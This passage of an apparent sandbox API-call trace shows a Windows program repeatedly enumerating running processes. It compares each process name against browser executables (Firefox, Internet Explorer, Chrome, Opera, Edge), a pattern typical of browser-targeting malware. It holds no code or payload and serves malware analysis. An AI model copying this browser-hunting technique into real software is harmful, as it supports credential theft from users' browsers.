dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0182.220] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0182.220] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0182.220] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0182.220] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0182.220] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.220] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0182.220] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0182.221] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0182.221] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0182.221] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0182.221] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0182.221] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0182.221] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0182.221] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0182.221] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0182.221] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0182.221] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0182.221] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0182.222] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0182.222] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0182.222] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0182.222] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0182.222] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0182.222] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0182.222] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0182.222] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0182.222] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0182.222] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0182.222] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0182.222] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0182.223] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0182.223] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0182.223] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0182.223] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0182.223] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0182.223] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0182.224] CloseHandle (hObject=0xe8) returned 1 [0182.224] Sleep (dwMilliseconds=0x3e8) [0183.231] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0183.232] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0183.233] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0183.233] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0183.233] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0183.233] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0183.233] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0183.233] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0183.233] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0183.233] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0183.233] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0183.233] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0183.233] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0183.233] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0183.234] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0183.234] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0183.234] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0183.234] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0183.234] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.234] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0183.235] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0183.235] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0183.235] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0183.235] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0183.235] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0183.235] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0183.235] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0183.235] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0183.235] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0183.235] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0183.235] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.235] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0183.236] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0183.236] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0183.236] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0183.236] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0183.236] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0183.236] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0183.236] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0183.236] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0183.236] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0183.236] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0183.236] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.236] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0183.237] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0183.237] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0183.237] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0183.237] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0183.237] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.237] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0183.238] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0183.238] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0183.238] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0183.238] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0183.238] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0183.238] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0183.238] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0183.238] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0183.238] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0183.238] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0183.238] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0183.238] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.239] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0183.239] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0183.239] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0183.239] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0183.239] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.239] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.239] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0183.239] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0183.239] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0183.239] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0183.239] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.239] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.240] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0183.240] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0183.240] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0183.240] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0183.240] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.240] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.241] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0183.241] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0183.241] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0183.241] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0183.241] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.241] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.241] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0183.241] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0183.241] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0183.241] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0183.241] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.241] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0183.242] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0183.242] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0183.242] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0183.242] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0183.242] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0183.242] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.242] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0183.242] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0183.242] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0183.242] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0183.242] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.243] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.243] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0183.243] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0183.243] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0183.243] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0183.243] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.243] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0183.244] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0183.244] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0183.244] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0183.244] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0183.244] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0183.244] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0183.245] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0183.245] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0183.245] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0183.245] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0183.245] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.245] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0183.245] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0183.245] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0183.245] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0183.245] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0183.245] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.245] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0183.246] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0183.246] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0183.246] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0183.246] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0183.246] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.246] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0183.246] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0183.247] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0183.247] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0183.247] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0183.247] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.247] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0183.247] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0183.247] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0183.247] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0183.247] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0183.247] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0183.247] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0183.248] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0183.248] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0183.248] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0183.248] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0183.248] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0183.248] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0183.248] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0183.248] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0183.248] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0183.248] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0183.248] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.248] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0183.249] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0183.249] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0183.249] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0183.249] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0183.249] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0183.249] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0183.249] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0183.250] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0183.250] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0183.250] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0183.250] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0183.250] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0183.250] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0183.250] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0183.250] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0183.250] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0183.250] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.250] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0183.251] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0183.251] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0183.251] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0183.251] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0183.251] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0183.251] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0183.251] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0183.251] lstrcmpiA (lpString1="seeker.exe", 